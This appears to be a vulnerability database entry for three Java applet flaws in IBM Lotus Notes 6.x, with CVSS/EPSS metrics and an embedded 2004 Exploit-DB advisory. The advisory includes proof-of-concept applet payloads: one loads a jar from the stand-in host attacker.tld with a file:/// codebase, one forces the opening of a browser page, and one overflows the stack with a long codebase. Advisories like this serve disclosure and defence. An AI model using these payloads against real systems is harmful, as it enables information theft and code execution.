Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24275
Publication date : 2004-07-12 22h00 +00:00
Author : Jouko Pynnonen
EDB Verified : Yes
source: https://www.securityfocus.com/bid/10704/info
IBM Lotus Notes is affected by three vulnerabilities concerning Java applets.
An attacker can exploit these issues to disclose potentially sensitive information, cause a web browser to open an arbitrary web page, and cause a stack-based buffer overflow that may be exploited to execute arbitrary code.
IBM has confirmed these vulnerabilities and has stated that they are currently under investigation. IBM problem reports for these vulnerabilities are KSPR5YS6GR, KSPR62F4D3, and KSPR62F4KN.
<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>
Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}
Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>
Products Mentioned
Configuraton 0
Ibm>>Lotus_notes >> Version 6.0
Ibm>>Lotus_notes >> Version 6.0.1
Ibm>>Lotus_notes >> Version 6.0.2
Ibm>>Lotus_notes >> Version 6.0.3
Ibm>>Lotus_notes >> Version 6.0.4
Ibm>>Lotus_notes >> Version 6.0.5
Ibm>>Lotus_notes >> Version 6.5
Ibm>>Lotus_notes >> Version 6.5.1
Ibm>>Lotus_notes >> Version 6.5.2
Ibm>>Lotus_notes >> Version 6.5.3
References